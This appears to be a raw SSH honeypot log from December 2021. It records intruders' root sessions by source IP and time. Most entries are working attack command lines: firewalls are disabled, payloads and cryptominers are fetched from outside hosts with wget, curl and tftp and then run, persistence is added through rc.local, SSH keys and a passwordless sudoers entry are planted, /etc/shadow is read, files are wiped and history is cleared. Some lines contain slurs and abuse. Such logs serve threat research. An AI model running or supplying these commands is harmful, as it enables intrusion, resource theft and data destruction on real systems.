From 222.186.133.160 15-Dec-2021 10:04:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/maaz;chmod 777 maaz;./maaz;echo "cd /tmp/">>/etc/rc.local;echo "./maaz&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/maaz
chmod 777 maaz
./maaz
echo "cd /tmp/">>/etc/rc.local
echo "./maaz
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 45.207.43.129 16-Dec-2021 04:47:52 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.207.43.129:8003/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://45.207.43.129:8003/Linux2.6
chmod 777 Linux2.6
./Linux2.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://45.207.43.129:8003/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://45.207.43.129:8003/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 45.61.187.248 16-Dec-2021 08:03:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/sshd64.sh;curl -O http://137.220.194.92/sshd64.sh;chmod 777 sshd64.sh;sh sshd64.sh;rm -f sshd64.sh
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/sshd64.sh
curl -O http://137.220.194.92/sshd64.sh
chmod 777 sshd64.sh
sh sshd64.sh
rm -f sshd64.sh

From 198.98.55.228 16-Dec-2021 08:17:20 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.98.55.228:8003/QW.6;chmod 777 QW;./QW;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.98.55.228:8003/QW.6
chmod 777 QW
./QW
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.98.55.228:8003/QW.6;chmod 777 QW;./QW;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.98.55.228:8003/QW.6
chmod 777 QW
./QW

From 45.88.188.236 17-Dec-2021 06:31:06 ssh2 root
ls
w
lscpu
ls
nano test.pl
uname 
cat /etc/issue
cd /var/tmp
wget nasapaul.com/ninfo
wget nasapaul.com
wget nashttps://nasapaul.com/v.py

From 45.88.188.236 17-Dec-2021 07:38:22 ssh2 root
la
ls
cd /var/tmp
ls
ls
cd /
la
ls
cd
ls
ls /home
clear
apt-get
apt-get install nano
clear cd
cd /var
ls
lscpu
free -mt
wget

From 188.68.62.150 17-Dec-2021 07:50:09 ssh2 root
curl
apt instwll cir
apt insratall curl
apt-get install curl
curl nasapaul.com/v.py
cuel
curl
eoxit
exit

From 45.88.188.236 17-Dec-2021 11:41:25 ssh2 root
lscpu

From 62.231.94.91 17-Dec-2021 13:37:17 ssh2 root
clear
lscpu

From 62.231.94.91 17-Dec-2021 13:38:29 ssh2 root
curl
apt-get install curl
curl
bash
sudo su
su
help
cat /etcoers
cd /etc
ls
cat test.pl
cd Mail
ls -la
cd ..
ls -la
cat .bash_history
type test.pl
perl test.py
perl test.pl
python3
python
python
apt-get install python

From 185.56.80.65 17-Dec-2021 13:41:27 ssh2 root
python
ls
cd
ls
python
python3
py
clear
perl

From 195.3.147.47 17-Dec-2021 13:46:41 ssh2 root
cls
help
rpm2cpio
cpio
cls

From 185.243.218.50 17-Dec-2021 14:01:27 ssh2 root
uname -a
cd /etc
ls
ls /etc
ll ls
lcd .ssh
ls
cd .ssh ls
ls
pwd
ls /home
cd /home
ls
term
$TERM=xterm
exort
export
ww
w
python
py
perl
php
w
find
grep
etc/issue
etc 
cat /proc/cpuinfo
cat /proc/cpuinfo
cat /etc/issue
cat /etc/passwd
wget
wget nasapaul.com/ninfo -O file
wget nasapa-u
wget
wget -u

From 8.37.43.225 17-Dec-2021 14:05:07 ssh2 root
wget http://nasapaul.com/v.py
nbano
nano
edit
e
uname -a
uname

From 193.105.134.45 17-Dec-2021 15:53:50 ssh2 root
uname
ls
ls
vmware
list
h
help -h
uname
cd
ls
simpleirewall-stabl
clear

From 146.71.76.11 17-Dec-2021 15:59:02 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://stirileprotv.gq/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp stirileprotv.gq -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g stirileprotv.gq; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://stirileprotv.gq/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp stirileprotv.gq -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g stirileprotv.gq
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 205.185.125.184 17-Dec-2021 19:21:16 ssh2 root
Exec sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c
sudo hive-passwd `hostname`
echo `hostname`
pkill Xorg
pkill x11vnc
pkill Hello
systemctl stop shellinabox
history -c

From 35.192.179.181 17-Dec-2021 23:14:07 ssh2 root
Exec nproc;cat /etc/*-release |grep PRETTY_NAME
nproc
cat /etc/*-release |grep PRETTY_NAME

From 205.185.114.149 18-Dec-2021 13:42:30 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 nigga; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 nigga
rm x86_64

From 211.22.65.18 18-Dec-2021 16:42:48 ssh2 root
Exec uname -a;wget ftp://cpa:cpa@5.45.119.175/znoki.jpg ; perl znoki.jpg ; rm -rf zn* ; history -c
uname -a
wget ftp://cpa:cpa@5.45.119.175/znoki.jpg
perl znoki.jpg
rm -rf zn*
history -c

From 205.185.125.184 18-Dec-2021 18:06:22 ssh2 root
Exec sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c
sudo hive-passwd `hostname`
echo `hostname`
pkill Xorg
pkill x11vnc
pkill Hello
systemctl stop shellinabox
history -c

From 167.99.41.232 18-Dec-2021 21:13:20 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://sekinarh.tk/sh
curl -O http://sekinarh.tk/sh
chmod 777 sh
sh sh
tftp sekinarh.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g sekinarh.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 137.220.194.15 19-Dec-2021 13:42:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/defender64.sh;curl -O http://137.220.194.92/defender64.sh;chmod 777 defender64.sh;sh defender64.sh;rm -f defender64.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/defender64.sh
curl -O http://137.220.194.92/defender64.sh
chmod 777 defender64.sh
sh defender64.sh
rm -f defender64.sh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://137.220.194.92/defender64.sh;curl -O http://137.220.194.92/defender64.sh;chmod 777 defender64.sh;sh defender64.sh;rm -f defender64.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://137.220.194.92/defender64.sh
curl -O http://137.220.194.92/defender64.sh
chmod 777 defender64.sh
sh defender64.sh
rm -f defender64.sh

From 200.119.112.204 19-Dec-2021 20:19:21 ssh2 root
Exec echo "Uname: "`uname -a`;echo "ID: "`id`
echo "Uname: "`uname -a`
echo "ID: "`id`

From 220.167.103.107 20-Dec-2021 05:47:09 ssh2 root
ls
id
apt
lscpu

From 220.167.103.107 20-Dec-2021 05:49:33 ssh2 root
curl
apt install curl
curl
uname -a
yum
cat /etc/redhat-release
cat /etc/redhat-release
cat /proc/version
curl
screen -S xxx
apt install screen
screen -S xxx
apt-get install curl
curl

From 103.150.36.98 20-Dec-2021 05:52:51 ssh2 root
cd /etc/
ls
cd
ls

From 188.166.103.91 20-Dec-2021 08:47:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://sekinarh.tk/sh; curl -O http://sekinarh.tk/sh; chmod 777 sh; sh sh; tftp sekinarh.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g sekinarh.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://sekinarh.tk/sh
curl -O http://sekinarh.tk/sh
chmod 777 sh
sh sh
tftp sekinarh.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g sekinarh.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 sekinarh.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 178.138.96.110 22-Dec-2021 16:03:32 ssh2 root
w
lscpu
ls -a
exit

From 161.35.201.142 23-Dec-2021 02:16:54 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44XKLDbSztdXqao2Rs2EFFLvdjsbRwYrP1FkqdqB91v1PohHdSSTjyeKQ4t6UMFXNdYpxkNhwpi9xTRmEsk6PeUSLHCfeLR

From 178.138.96.110 23-Dec-2021 12:25:14 ssh2 root
w
lscpu
scp sucky me too
exit

From 137.220.194.15 23-Dec-2021 17:10:06 ssh2 root
Exec cd /tmp;wget -c http://205.185.117.54/sensi.sh;curl -O http://205.185.117.54/sensi.sh;chmod 777 sensi.sh;sh sensi.sh;rm -f sensi.sh;
cd /tmp
wget -c http://205.185.117.54/sensi.sh
curl -O http://205.185.117.54/sensi.sh
chmod 777 sensi.sh
sh sensi.sh
rm -f sensi.sh

From 188.166.103.91 23-Dec-2021 18:18:05 ssh2 root
Exec cd /tmp ; mkdir .x ; cd .x ; wget https://coxro.000webhostapp.com/xmrig ; chmod +x xmrig ; mv xmrig systemd ; ./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B ; echo DONE
cd /tmp
mkdir .x
cd .x
wget https://coxro.000webhostapp.com/xmrig
chmod +x xmrig
mv xmrig systemd
./systemd -o 37.187.95.110:443 -u 8ALdP9yTXenfNjgpm5TrRf7TGoBr8aUKU3kQcu7CLzfVJZYMXTohVb85GrRu7dy8PsTYrcisdG9LdMTmkuPRdZN7CnFsVWB -k --tls -p MinerCox -B
echo DONE

From 146.0.75.250 23-Dec-2021 18:53:02 ssh2 root
Exec cat /etc/issue
cat /etc/issue

From 222.186.133.160 24-Dec-2021 02:20:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 164.90.230.201 24-Dec-2021 03:06:49 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo

From 164.90.230.201 24-Dec-2021 03:07:00 ssh2 root
Exec wget https://www.nasapaul.com/ninfo; curl -O https://www.nasapaul.com/ninfo; chmod 777 *; ./ninfo
wget https://www.nasapaul.com/ninfo
curl -O https://www.nasapaul.com/ninfo
chmod 777 *
./ninfo
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 165.232.92.17 24-Dec-2021 05:13:24 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 165.232.92.17 24-Dec-2021 05:14:26 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 112.65.206.11 24-Dec-2021 09:17:57 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o
mkdir /sbin/.ssh
cp ~/.ssh/authorized_keys /sbin/.ssh
chown daemon.daemon /sbin/.ssh /sbin/.ssh/*
chmod 700 /sbin/.ssh
chmod 600 /sbin/.ssh/authorized_keys
echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

From 209.141.54.15 24-Dec-2021 12:33:13 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.95.222.119/obins.sh
chmod 777 obins.sh
sh obins.sh
tftp 23.95.222.119 -c get otftp1.sh
chmod 777 otftp1.sh
sh otftp1.sh
tftp -r otftp2.sh -g 23.95.222.119
chmod 777 otftp2.sh
sh otftp2.sh
rm -rf obins.sh otftp1.sh otftp2.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.54.15 24-Dec-2021 12:34:07 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp || cd /run || cd /; wget http://23.95.222.119/obins.sh; chmod 777 obins.sh; sh obins.sh; tftp 23.95.222.119 -c get otftp1.sh; chmod 777 otftp1.sh; sh otftp1.sh; tftp -r otftp2.sh -g 23.95.222.119; chmod 777 otftp2.sh; sh otftp2.sh; rm -rf obins.sh otftp1.sh otftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://23.95.222.119/obins.sh
chmod 777 obins.sh
sh obins.sh
tftp 23.95.222.119 -c get otftp1.sh
chmod 777 otftp1.sh
sh otftp1.sh
tftp -r otftp2.sh -g 23.95.222.119
chmod 777 otftp2.sh
sh otftp2.sh
rm -rf obins.sh otftp1.sh otftp2.sh
rm -rf *

From 222.186.133.160 25-Dec-2021 00:15:16 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/wrnmm;chmod 777 wrnmm;./wrnmm;echo "cd /tmp/">>/etc/rc.local;echo "./wrnmm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/wrnmm
chmod 777 wrnmm
./wrnmm
echo "cd /tmp/">>/etc/rc.local
echo "./wrnmm
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 140.246.22.83 25-Dec-2021 23:21:43 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/stx.sh | LC_ALL=en_US.UTF-8 bash -s Q0105002514d458b24187074c10c261fa33e4a5e97051ebf0153cf50e61ac52fa27b7188c7b1f0f
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/stx.sh | LC_ALL=en_US.UTF-8 bash -s Q0105002514d458b24187074c10c261fa33e4a5e97051ebf0153cf50e61ac52fa27b7188c7b1f0f

From 121.134.173.39 27-Dec-2021 07:41:53 ssh2 root
Exec grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2 && grep -c ^processor /proc/cpuinfo && grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2 &&  grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2 &&  uptime && uname -a
grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2
grep -c ^processor /proc/cpuinfo
grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2
grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2
uptime
uname -a

From 121.134.173.39 27-Dec-2021 08:58:35 ssh2 root
Exec grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2 && grep -c ^processor /proc/cpuinfo && grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2 &&  grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2 &&  uptime && uname -a
grep -m 1 'model name' /proc/cpuinfo | cut -d: -f2
grep -c ^processor /proc/cpuinfo
grep -m 1 'stepping' /proc/cpuinfo | cut -d: -f2
grep -m 1 'bogomips' /proc/cpuinfo | cut -d: -f2
uptime
uname -a

From 129.227.46.79 27-Dec-2021 14:16:59 ssh2 root
w
ls -a
ip a|grpe glo
ip a|grperep glo
cat /e hosts
last
cd
ps -aef
ls -a /home
ls -a /homew
ss

From 129.227.46.79 27-Dec-2021 14:23:02 ssh2 root
w
ls -a /hop

From 5.183.209.217 27-Dec-2021 14:51:48 ssh2 root
i piss on your .. so called honey shit server you fucking so called asshole wow what ......?????? wget my penis in your mouth and wget in the mouth of your
exist
exit

From 178.138.96.110 27-Dec-2021 14:52:48 ssh2 root
halt
reboot
/sbin/init 1
shutdown

From 185.215.167.218 27-Dec-2021 22:46:03 ssh2 root
Exec cat /etc/issue
cat /etc/issue

From 156.226.21.27 29-Dec-2021 08:48:14 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://156.226.21.27:1180/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://156.226.21.27:1180/x86
chmod 777 x86
./x86
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://156.226.21.27:1180/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://156.226.21.27:1180/x86
chmod 777 x86
./x86

From 185.205.201.248 30-Dec-2021 02:08:34 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 142.93.106.104 30-Dec-2021 03:27:47 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
cat > /root/ifconfig

From 27.54.170.52 30-Dec-2021 03:36:34 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 206.189.13.19 30-Dec-2021 04:11:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://greektaverna.tk/sh; curl -O http://greektaverna.tk/sh; chmod 777 sh; sh sh; tftp greektaverna.tk -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g greektaverna.tk; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://greektaverna.tk/sh
curl -O http://greektaverna.tk/sh
chmod 777 sh
sh sh
tftp greektaverna.tk -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g greektaverna.tk
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 greektaverna.tk .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 178.138.96.110 30-Dec-2021 04:39:28 ssh2 root
w
lspcu
ucat /pro/cpuinfo
id richard
halt

From 212.192.241.163 30-Dec-2021 04:40:58 ssh2 root
Exec uname -s -v -n -r -m
uname -s -v -n -r -m
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 190.255.34.220 31-Dec-2021 14:02:20 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

